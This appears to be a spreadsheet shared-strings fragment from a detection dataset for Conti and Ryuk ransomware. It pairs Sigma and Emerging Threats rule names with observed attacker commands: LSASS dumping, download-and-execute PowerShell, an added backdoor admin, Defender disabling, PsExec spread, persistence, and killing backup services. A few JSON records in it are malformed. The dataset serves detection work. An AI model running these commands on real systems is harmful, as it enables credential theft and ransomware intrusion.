    <t>Dridex Process Pattern - e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e</t>
  </si>
  <si>
    <t>Domain Trust Discovery - 3bad990e-4848-4a78-9530-b427d854aac0</t>
  </si>
  <si>
    <t>CreateMiniDump Hacktool - 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d</t>
  </si>
  <si>
    <t>CobaltStrike Service Installations - 5a105d34-05fc-401e-8553-272b45c1522d</t>
  </si>
  <si>
    <t>LSASS Memory Dump - 5ef9853e-4d0e-4a70-846f-a9ca37d876da</t>
  </si>
  <si>
    <t>Local Accounts Discovery - 502b42de-4306-40b4-9596-6f590c81f073</t>
  </si>
  <si>
    <t>Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) - 2afafd61-6aae-4df4-baed-139fa1f4c345</t>
  </si>
  <si>
    <t>Execution from Suspicious Folder - 3dfd06d2-eaf4-4532-9555-68aca59f57c4</t>
  </si>
  <si>
    <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines - 26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
  </si>
  <si>
    <t>Malicious PowerShell Commandlets - 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6</t>
  </si>
  <si>
    <t>LSASS Memory Dumping - ffa6861c-4461-4f59-8a41-578c39f3f23e</t>
  </si>
  <si>
    <t>Mimikatz Detection LSASS Access - 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9</t>
  </si>
  <si>
    <t>Net.exe Execution - 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac</t>
  </si>
  <si>
    <t>Windows PowerShell Web Request - 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
  </si>
  <si>
    <t>Windows Network Enumeration - 62510e69-616b-4078-b371-847da438cc03</t>
  </si>
  <si>
    <t>Whoami Execution - e28a5a99-da44-436d-b7a0-2afc20a5f413</t>
  </si>
  <si>
    <t>Usage of Sysinternals Tools - 25ffa65d-76d8-4da5-a832-3f2b0136e133</t>
  </si>
  <si>
    <t>UNC2452 Process Creation Patterns - 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f</t>
  </si>
  <si>
    <t>Trickbot Malware Recon Activity - 410ad193-a728-4107-bc79-4419789fcbf8</t>
  </si>
  <si>
    <t>Suspicious WMI Execution - 526be59f-a573-4eea-b5f7-f0973207634d</t>
  </si>
  <si>
    <t>Suspicious Use of Procdump on LSASS - 5afee48e-67dd-4e03-a783-f74259dcf998</t>
  </si>
  <si>
    <t>Suspicious Use of Procdump - 03795938-1387-481b-9f4c-3f6241e604fe</t>
  </si>
  <si>
    <t>Suspicious Remote Thread Created - 66d31e5f-52d6-40a4-9615-002d3789a119</t>
  </si>
  <si>
    <t>Suspicious PowerShell Parent Process - 754ed792-634f-40ae-b3bc-e0448d33f695</t>
  </si>
  <si>
    <t>Suspicious In-Memory Module Execution - 5f113a8f-8b61-41ca-b90f-d374fa7e4a39</t>
  </si>
  <si>
    <t>Suspicious Encoded PowerShell Command Line - ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
  </si>
  <si>
    <t>Suspicious AdFind Execution - 75df3b17-8bcc-4565-b89b-c9898acef911</t>
  </si>
  <si>
    <t>Rundll32 Internet Connection - cdc8da7d-c303-42f8-b08c-b4ab47230263</t>
  </si>
  <si>
    <t>Regsvr32 Anomaly - 8e2b24c9-4add-46a0-b4bb-0057b4e6187d</t>
  </si>
  <si>
    <t>Rare Service Installs - 66bfef30-22a5-4fcd-ad44-8d81e60922ae</t>
  </si>
  <si>
    <t>PsExec Tool Execution - 42c575ea-e41e-41f1-b248-8093c3e82a28</t>
  </si>
  <si>
    <t>Psexec Accepteula Condition - 730fc21b-eaff-474b-ad23-90fd265d4988</t>
  </si>
  <si>
    <t>PowerShell Scripts Installed as Services - a2e5019d-a658-4c6a-92bf-7197b54e2cae</t>
  </si>
  <si>
    <t>LSASS Memory Dump File Creation - 5e3d3601-0662-4af0-b1d2-36a05e90c40a</t>
  </si>
  <si>
    <t>PowerShell as a Service in Registry - 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d</t>
  </si>
  <si>
    <t>PowerShell Download from URL - 3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
  </si>
  <si>
    <t>Non Interactive PowerShell - f4bbd493-b796-416e-bbf2-121235348529</t>
  </si>
  <si>
    <t>PowerShell Execution - 867613fb-fa60-4497-a017-a82df74a172c</t>
  </si>
  <si>
    <t>PowerShell Network Connections - 1f21ec3f-810d-4b0e-8045-322202e22b4b</t>
  </si>
  <si>
    <t>{"date": "2021-08": "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>regsvr32 /s C:\Users\user\appdata\local\temp\random.dll</t>
  </si>
  <si>
    <t>C:\Users\&lt;uname&gt;\AppData\LocalTemp\tdr58DD.exe</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' c:\windows\system32\cmd.exe /c echo b30f789ed5b &gt; \\. \pipe\2b5fe9 ''', "initiating_process_command_line": "wuauclt.exe"}</t>
  </si>
  <si>
    <t>{"object": "service_install", "file_name": "%COMPSEC % /b /c start /b /min powershell -nop -w hidden -encodedcommand"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' esentutl /p /o c:\Users\user\AppData\Local\Temp\grabber_temp.edb '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' wmic /node: "DEVICE.LOCAL" process call create "c:\Perflogs\procdump.exe -accepteula -ma lsass "c:\PerLogs\lsass.dmp" '''}</t>
  </si>
  <si>
    <t>wmic-pid, procdump-pid</t>
  </si>
  <si>
    <t>{"object": "http_request", "http_method" : "GET", "http_url" : "IP/cert/bec_http_222_x86_13567_1.exe" , "user_agent" : "curl/7.74.0"}</t>
  </si>
  <si>
    <t>conti-eid0302</t>
  </si>
  <si>
    <t>conti-eid0303</t>
  </si>
  <si>
    <t>conti-eid0304</t>
  </si>
  <si>
    <t>conti-eid0305</t>
  </si>
  <si>
    <t>conti-eid0306</t>
  </si>
  <si>
    <t>conti-eid0307</t>
  </si>
  <si>
    <t>conti-eid0308</t>
  </si>
  <si>
    <t>conti-eid0309</t>
  </si>
  <si>
    <t>conti-eid0310</t>
  </si>
  <si>
    <t>conti-eid0311</t>
  </si>
  <si>
    <t>conti-eid0312</t>
  </si>
  <si>
    <t>conti-eid0313</t>
  </si>
  <si>
    <t>conti-eid0314</t>
  </si>
  <si>
    <t>conti-eid0315</t>
  </si>
  <si>
    <t>conti-eid0316</t>
  </si>
  <si>
    <t>conti-eid0317</t>
  </si>
  <si>
    <t>conti-eid0318</t>
  </si>
  <si>
    <t>conti-eid0319</t>
  </si>
  <si>
    <t>conti-eid0320</t>
  </si>
  <si>
    <t>conti-eid0321</t>
  </si>
  <si>
    <t>conti-eid0322</t>
  </si>
  <si>
    <t>conti-eid0323</t>
  </si>
  <si>
    <t>conti-eid0324</t>
  </si>
  <si>
    <t>conti-eid0325</t>
  </si>
  <si>
    <t>conti-eid0326</t>
  </si>
  <si>
    <t>conti-eid0327</t>
  </si>
  <si>
    <t>conti-eid0328</t>
  </si>
  <si>
    <t>conti-eid0329</t>
  </si>
  <si>
    <t>conti-eid0330</t>
  </si>
  <si>
    <t>conti-eid0331</t>
  </si>
  <si>
    <t>conti-eid0332</t>
  </si>
  <si>
    <t>conti-eid0333</t>
  </si>
  <si>
    <t>conti-eid0334</t>
  </si>
  <si>
    <t>conti-eid0335</t>
  </si>
  <si>
    <t>conti-eid0336</t>
  </si>
  <si>
    <t>conti-eid0337</t>
  </si>
  <si>
    <t>conti-eid0338</t>
  </si>
  <si>
    <t>conti-eid0339</t>
  </si>
  <si>
    <t>conti-eid0340</t>
  </si>
  <si>
    <t>conti-eid0341</t>
  </si>
  <si>
    <t>conti-eid0342</t>
  </si>
  <si>
    <t>conti-eid0343</t>
  </si>
  <si>
    <t>conti-eid0344</t>
  </si>
  <si>
    <t>conti-eid0345</t>
  </si>
  <si>
    <t>conti-eid0346</t>
  </si>
  <si>
    <t>conti-eid0347</t>
  </si>
  <si>
    <t>conti-eid0348</t>
  </si>
  <si>
    <t>conti-eid0349</t>
  </si>
  <si>
    <t>conti-eid0350</t>
  </si>
  <si>
    <t>conti-eid0351</t>
  </si>
  <si>
    <t>conti-eid0352</t>
  </si>
  <si>
    <t>conti-eid0353</t>
  </si>
  <si>
    <t>conti-eid0354</t>
  </si>
  <si>
    <t>conti-eid0355</t>
  </si>
  <si>
    <t>conti-eid0356</t>
  </si>
  <si>
    <t>conti-eid0357</t>
  </si>
  <si>
    <t>conti-eid0358</t>
  </si>
  <si>
    <t>conti-eid0359</t>
  </si>
  <si>
    <t>conti-eid0360</t>
  </si>
  <si>
    <t>conti-eid0361</t>
  </si>
  <si>
    <t>conti-eid0362</t>
  </si>
  <si>
    <t>conti-eid0363</t>
  </si>
  <si>
    <t>conti-eid0364</t>
  </si>
  <si>
    <t>conti-eid0365</t>
  </si>
  <si>
    <t>conti-eid0366</t>
  </si>
  <si>
    <t>conti-eid0367</t>
  </si>
  <si>
    <t>conti-eid0368</t>
  </si>
  <si>
    <t>conti-eid0369</t>
  </si>
  <si>
    <t>conti-eid0370</t>
  </si>
  <si>
    <t>conti-eid0371</t>
  </si>
  <si>
    <t>conti-eid0372</t>
  </si>
  <si>
    <t>conti-eid0373</t>
  </si>
  <si>
    <t>conti-eid0374</t>
  </si>
  <si>
    <t>conti-eid0375</t>
  </si>
  <si>
    <t>conti-eid0376</t>
  </si>
  <si>
    <t>conti-eid0377</t>
  </si>
  <si>
    <t>conti-eid0378</t>
  </si>
  <si>
    <t>conti-eid0379</t>
  </si>
  <si>
    <t>conti-eid0380</t>
  </si>
  <si>
    <t>conti-eid0381</t>
  </si>
  <si>
    <t>conti-eid0382</t>
  </si>
  <si>
    <t>conti-eid0383</t>
  </si>
  <si>
    <t>conti-eid0384</t>
  </si>
  <si>
    <t>{  "date": "2021", "url": "https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{"date": "2021-09", "url": "https://talosintelligence.com/resources/269", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{"date": "2021-05": "https://thedfirreport.com/2021/05/12/conti-ransomware/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t xml:space="preserve">rundll32.exe "C:\Users\REDACTED\AppData\Local\Temp\rate_x32.dat",update /i:"LaborBetray\license.dat" </t>
  </si>
  <si>
    <t>whoami /groups</t>
  </si>
  <si>
    <t>nltest /domain_trusts  /all_trusts</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "nltest /domain_trusts  /all_trusts", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "ipconfig /all", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "systeminfo", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "whoami /groups", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "net config workstation", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "nltest /domain_trusts", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "net view /all /domain", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "net group "Domain Admins" /domain", "initiating_process_name" : "rundll32.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "cmd /c whoami /groups", "initiating_process_name" : "icjul.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "cmd /c query session", "initiating_process_name" : "icjul.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "cmd /c dir %homedrive%homepath%", "initiating_process_name" : "icjul.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "cmd /c nltest /dclist", "initiating_process_name" : "icjul.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "cmd /c nltext /domain_trust", "initiating_process_name" : "icjul.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "cmd /c net group \"Enterprise Admins\"  /domain", "initiating_process_name" : "icjul.exe"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line" : "cmd /c net group \"Domain Admins\" /domain ", "initiating_process_name" : "icjul.exe"}</t>
  </si>
  <si>
    <t>cmd.exe /C dsquery subnet -limit 0</t>
  </si>
  <si>
    <t>{"object" : "pipe", "process_command_line" : “C:\Windows\system32\cmd.exe /c echo 4d64fbbbf34 &gt; \\.\pipe\b4312c” , "initiating_process_path" : "c:\windows\System32\runonce.exe"}</t>
  </si>
  <si>
    <t xml:space="preserve">cmd.exe /C reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f </t>
  </si>
  <si>
    <t>cmd.exe /C netsh firewall set service type = remotedesktop mode = enable</t>
  </si>
  <si>
    <t xml:space="preserve">cmd.exe /C netsh firewall set rule group="remote desktop" new enable=Yes </t>
  </si>
  <si>
    <t xml:space="preserve">cmd.exe /C netsh advfirewall set rule group="remote desktop" new enable=Yes </t>
  </si>
  <si>
    <t xml:space="preserve">cmd.exe /C copy 192145.dll \\&lt;INTERNAL_IP&gt;\ADMIN$ /Y /Z </t>
  </si>
  <si>
    <t xml:space="preserve">psexec.exe -accepteula -d -s \\&lt;INTERNAL_IP&gt; rundll32.exe C:\windows\192145.dll,StartW </t>
  </si>
  <si>
    <t>cmd-pid</t>
  </si>
  <si>
    <t>spawn</t>
  </si>
  <si>
    <t>psexesvc.exe &gt; rundll32.exe &gt; cmd.exe</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": rundll32.exe c:\windows\192145.dll, StartW", "process_command_line": "cmd.exe /c echo &lt;randomstring&gt; &gt; \"c:\windows\TEMP\dem238D.tmp\" &amp;exit"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "C:\Windows\System32\dllhost.exe", "process_command_line": "C:\Windows\system32\cmd.exe /C gpupdate /force "}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "C:\Users\USER\AppData\Local\Temp\icju1.exe ", "process_command_line": "C:\Windows\system32\cmd.exe /C gpupdate /force "}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "C:\Windows\System32\dllhost.exe  ", "process_command_line": "C:\Windows\system32\cmd.exe /C gpupdate /force "}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_command_line": "“rundll32.exe” c:\windows\192145.dll,StartW  ", "process_command_line": "C:\Windows\system32\cmd.exe /C gpupdate /force "}</t>
  </si>
  <si>
    <t xml:space="preserve">HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware </t>
  </si>
  <si>
    <t xml:space="preserve">HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableRealtimeMonitoring </t>
  </si>
  <si>
    <t xml:space="preserve">HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableBehaviorMonitoring </t>
  </si>
  <si>
    <t xml:space="preserve">HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableIntrusionPreventionSystem </t>
  </si>
  <si>
    <t xml:space="preserve">HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection </t>
  </si>
  <si>
    <t>net user /add /Y nuuser 7HeC00l3stP@ssw0rd</t>
  </si>
  <si>
    <t>net localgroup administrators nuuser /add</t>
  </si>
  <si>
    <t>registry</t>
  </si>
  <si>
    <t>{"object": "process_access", "access" : "0x1010", "file_name" : "lsass.exe", "initiating_file_name": "runonce.exe"}</t>
  </si>
  <si>
    <t>ET MALWARE Win32/IcedID Requesting Encoded Binary M4 
ET MALWARE W32/Photoloader.Downloader Request Cookie 
ET POLICY PE EXE or DLL Windows file download HTTP 
ET INFO Executable Retrieved With Minimal HTTP Headers – Potential Second Stage Download 
ET INFO Packed Executable Download 
ET POLICY OpenSSL Demo CA – Internet Widgits Pty 
ATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5 
ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection 
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection 
ET SCAN Behavioral Unusual Port 1434 traffic Potential Scan or Infection 
ET SCAN Behavioral Unusual Port 1435 traffic Potential Scan or Infection</t>
  </si>
  <si>
    <t>conti-eid0385</t>
  </si>
  <si>
    <t>conti-eid0386</t>
  </si>
  <si>
    <t>conti-eid0387</t>
  </si>
  <si>
    <t>conti-eid0388</t>
  </si>
  <si>
    <t>conti-eid0389</t>
  </si>
  <si>
    <t>conti-eid0390</t>
  </si>
  <si>
    <t>conti-eid0391</t>
  </si>
  <si>
    <t>conti-eid0392</t>
  </si>
  <si>
    <t>conti-eid0393</t>
  </si>
  <si>
    <t>conti-eid0394</t>
  </si>
  <si>
    <t>conti-eid0395</t>
  </si>
  <si>
    <t>conti-eid0396</t>
  </si>
  <si>
    <t>conti-eid0397</t>
  </si>
  <si>
    <t>conti-eid0398</t>
  </si>
  <si>
    <t>conti-eid0399</t>
  </si>
  <si>
    <t>conti-eid0400</t>
  </si>
  <si>
    <t>conti-eid0401</t>
  </si>
  <si>
    <t>conti-eid0402</t>
  </si>
  <si>
    <t>conti-eid0403</t>
  </si>
  <si>
    <t>conti-eid0404</t>
  </si>
  <si>
    <t>conti-eid0405</t>
  </si>
  <si>
    <t>conti-eid0406</t>
  </si>
  <si>
    <t>conti-eid0407</t>
  </si>
  <si>
    <t>conti-eid0408</t>
  </si>
  <si>
    <t>conti-eid0409</t>
  </si>
  <si>
    <t>conti-eid0410</t>
  </si>
  <si>
    <t>conti-eid0411</t>
  </si>
  <si>
    <t>conti-eid0412</t>
  </si>
  <si>
    <t>conti-eid0413</t>
  </si>
  <si>
    <t>conti-eid0414</t>
  </si>
  <si>
    <t>conti-eid0415</t>
  </si>
  <si>
    <t>conti-eid0416</t>
  </si>
  <si>
    <t>conti-eid0417</t>
  </si>
  <si>
    <t>conti-eid0418</t>
  </si>
  <si>
    <t>conti-eid0419</t>
  </si>
  <si>
    <t>conti-eid0420</t>
  </si>
  <si>
    <t>conti-eid0421</t>
  </si>
  <si>
    <t>conti-eid0422</t>
  </si>
  <si>
    <t>conti-eid0423</t>
  </si>
  <si>
    <t>conti-eid0424</t>
  </si>
  <si>
    <t>conti-eid0425</t>
  </si>
  <si>
    <t>conti-eid0426</t>
  </si>
  <si>
    <t>conti-eid0427</t>
  </si>
  <si>
    <t>conti-eid0428</t>
  </si>
  <si>
    <t>conti-eid0429</t>
  </si>
  <si>
    <t>conti-eid0430</t>
  </si>
  <si>
    <t>conti-eid0431</t>
  </si>
  <si>
    <t>conti-eid0432</t>
  </si>
  <si>
    <t>C:\Users\USER\Downloads\ResizeFormToFit.exe</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>{"date": "2021-01": "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>{"object": "file_create", "initiating_file_path": "c:\Users\user\Downloads\somthing.exe", "file_path": "c:\users\user\Appdata\local\temp\M1E1626.exe"}</t>
  </si>
  <si>
    <t>rundll32.exe C:\Users\USER\AppData\Local\Temp\BA6b.tmp.dll, StartW</t>
  </si>
  <si>
    <t>cmd.exe /c reg.exe add HKCU\\Software\Microsoft\Windows\CurrentVersion\Run /f /v T4QJ4U39BI1 /t REG_SZ /d " "C:\Users\User\Appdata\Local\Temp\M1E1626.exe\ "U3wtv" $amp; start "H" "C:\Users\user\Appdata\Local\Temp\M1E1626.exe" U3WTV3</t>
  </si>
  <si>
    <t>cmd.exe /c echo a3fed5b3a32 &gt; \\.\pipe\3406c2</t>
  </si>
  <si>
    <t>The use of the Cobalt Strike’s piped privilege escalation (Get-System) was used several times during the intrusion.</t>
  </si>
  <si>
    <t>cmd.exe /c nltest /domain_trusts /all_trusts</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C net group "enterprise admins" /domain</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C net group "domain admins" /domain</t>
  </si>
  <si>
    <t>IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35806/'); Find-LocalAdminAccess</t>
  </si>
  <si>
    <t>IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35585/'); Get-NetComputer -ping -operatingsystem *server*</t>
  </si>
  <si>
    <t>IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:23163/'); Get-NetSubnet</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C ping HOST</t>
  </si>
  <si>
    <t>Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C nltest /domain_trusts /all_trusts</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C C:\Windows\Temp\adf\adf.bat</t>
  </si>
  <si>
    <t>adfind.exe -sc trustdmp</t>
  </si>
  <si>
    <t>C:\Users\USER\Desktop\info\7z.exe</t>
  </si>
  <si>
    <t>C:\Users\USER\Desktop\info\comps.txt</t>
  </si>
  <si>
    <t>C:\Users\USER\Desktop\info\Get-DataInfo.ps1</t>
  </si>
  <si>
    <t>domain controller</t>
  </si>
  <si>
    <t>C:\Users\USER\Desktop\info\netscan.exe</t>
  </si>
  <si>
    <t>C:\Users\USER\Desktop\info\start.bat</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /c ""C:\Users\USER\Desktop\info\start.bat""</t>
  </si>
  <si>
    <t>Get-DataInfo.ps1</t>
  </si>
  <si>
    <t xml:space="preserve">Meterpreter or Cobalt Strike Getsystem Service Start - 15619216-e993-4721-b590-4c520615a67d </t>
  </si>
  <si>
    <t>Successful Overpass the Hash Attempt - 192a0330-c20b-4356-90b6-7b7049ae0b87</t>
  </si>
  <si>
    <t>conti-eid0433</t>
  </si>
  <si>
    <t>conti-eid0434</t>
  </si>
  <si>
    <t>conti-eid0435</t>
  </si>
  <si>
    <t>conti-eid0436</t>
  </si>
  <si>
    <t>conti-eid0437</t>
  </si>
  <si>
    <t>conti-eid0438</t>
  </si>
  <si>
    <t>conti-eid0439</t>
  </si>
  <si>
    <t>conti-eid0440</t>
  </si>
  <si>
    <t>conti-eid0441</t>
  </si>
  <si>
    <t>conti-eid0442</t>
  </si>
  <si>
    <t>conti-eid0443</t>
  </si>
  <si>
    <t>conti-eid0444</t>
  </si>
  <si>
    <t>conti-eid0445</t>
  </si>
  <si>
    <t>conti-eid0446</t>
  </si>
  <si>
    <t>conti-eid0447</t>
  </si>
  <si>
    <t>conti-eid0448</t>
  </si>
  <si>
    <t>conti-eid0449</t>
  </si>
  <si>
    <t>conti-eid0450</t>
  </si>
  <si>
    <t>conti-eid0451</t>
  </si>
  <si>
    <t>conti-eid0452</t>
  </si>
  <si>
    <t>conti-eid0453</t>
  </si>
  <si>
    <t>conti-eid0454</t>
  </si>
  <si>
    <t>conti-eid0455</t>
  </si>
  <si>
    <t>conti-eid0456</t>
  </si>
  <si>
    <t>conti-eid0457</t>
  </si>
  <si>
    <t>conti-eid0458</t>
  </si>
  <si>
    <t>conti-eid0459</t>
  </si>
  <si>
    <t>conti-eid0460</t>
  </si>
  <si>
    <t>conti-eid0461</t>
  </si>
  <si>
    <t>conti-eid0462</t>
  </si>
  <si>
    <t>conti-eid0463</t>
  </si>
  <si>
    <t>conti-eid0464</t>
  </si>
  <si>
    <t>conti-eid0465</t>
  </si>
  <si>
    <t>ET INFO Observed DNS Query for EmerDNS TLD (.bazar)
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
ETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)</t>
  </si>
  <si>
    <t>conti-eid0466</t>
  </si>
  <si>
    <t>{"date": "2021-11": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_name": "firefox.exe", "process_command_line": r''' "C:\Windows\System32\schtasks.exe" /CREATE /SC ONSTART /TN jf0c /TR "'C:\Users\pagefilerpqy.exe'" /f /RL HIGHEST '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_name": "firefox.exe", "process_command_line": r''' "C:\Windows\System32\schtasks.exe" /CREATE /SC ONSTART /TN jf0c /TR "'C:\Users\pagefilerpqy.exe'" /f '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_name": "firefox.exe", "process_command_line": r''' "C:\Windows\System32\schtasks.exe" /CREATE /SC ONCE /ST 17:21:58 /TN 9T6ukfi6 /TR "'C:\Users\pagefilerpqy.exe'" /f '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_name": "firefox.exe", "process_command_line": r'''"C:\Windows\System32\schtasks.exe" /CREATE /SC ONCE /ST 17:21:58 /TN 9T6ukfi6 /TR "'C:\Users\pagefilerpqy.exe'" /f /RL HIGHEST '''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_name": "firefox.exe", "process_command_line": r''' "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V \"microsoft update\" /t REG_SZ /F /D "SCHTASKS /run /tn 9T6ukfi6" '''}</t>
  </si>
  <si>
    <t>netlogon exploited</t>
  </si>
  <si>
    <t xml:space="preserve">net view /all </t>
  </si>
  <si>
    <t xml:space="preserve">net localgroup "administrator" </t>
  </si>
  <si>
    <t>AdFind.exe -f "(objectcategory=person)"</t>
  </si>
  <si>
    <t>AdFind.exe -f "(objectcategory=computer)"</t>
  </si>
  <si>
    <t>AdFind.exe -f "(objectcategory=organizationalUnit)"</t>
  </si>
  <si>
    <t>AdFind.exe -sc trustdmp</t>
  </si>
  <si>
    <t>AdFind.exe -subnets -f "(objectCategory=subnet)"</t>
  </si>
  <si>
    <t>AdFind.exe -f "(objectcategory=group)"</t>
  </si>
  <si>
    <t>AdFind.exe -gcb -sc trustdmp</t>
  </si>
  <si>
    <t>IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:23163/'); Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate</t>
  </si>
  <si>
    <t>\\HOSTNAME\ADMIN$\ff49429.exe</t>
  </si>
  <si>
    <t>"C:\Windows\system32\net1 stop ""samss"" /y"</t>
  </si>
  <si>
    <t>"C:\Windows\system32\net1 stop ""veeamcatalogsvc"" /y"</t>
  </si>
  <si>
    <t>"C:\Windows\system32\net1 stop ""veeamcloudsvc"" /y"</t>
  </si>
  <si>
    <t>"C:\Windows\system32\net1 stop ""veeamdeploysvc"" /y"</t>
  </si>
  <si>
    <t>2025194 ET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)
2023882 ET INFO HTTP Request to a *.top domain
ET INFO Observed DNS Query for EmerDNS_TLD (.bazar)
ET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access</t>
  </si>
  <si>
    <t>"C:\Windows\System32\taskkill.exe"" /IM sqlbrowser.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM sqlceip.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM sqlservr.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM sqlwriter.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.agent.configurationservice.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.brokerservice.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.catalogdataservice.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.cloudservice.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.manager.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.mountservice.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.service.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.uiserver.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.backup.wmiserver.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeamdeploymentsvc.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeamfilesysvsssvc.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeam.guest.interaction.proxy.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeamnfssvc.exe /F"
"C:\Windows\System32\taskkill.exe"" /IM veeamtransportsvc.exe /F"</t>
  </si>
  <si>
    <t>"C:\Windows\system32\taskmgr.exe"" /4"</t>
  </si>
  <si>
    <t>"C:\Windows\system32\wbem\wmiprvse.exe -Embedding"</t>
  </si>
  <si>
    <t>"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"</t>
  </si>
  <si>
    <t>conti-eid0467</t>
  </si>
  <si>
    <t>conti-eid0468</t>
  </si>
  <si>
    <t>conti-eid0469</t>
  </si>
  <si>
    <t>conti-eid0470</t>
  </si>
  <si>
    <t>conti-eid0471</t>
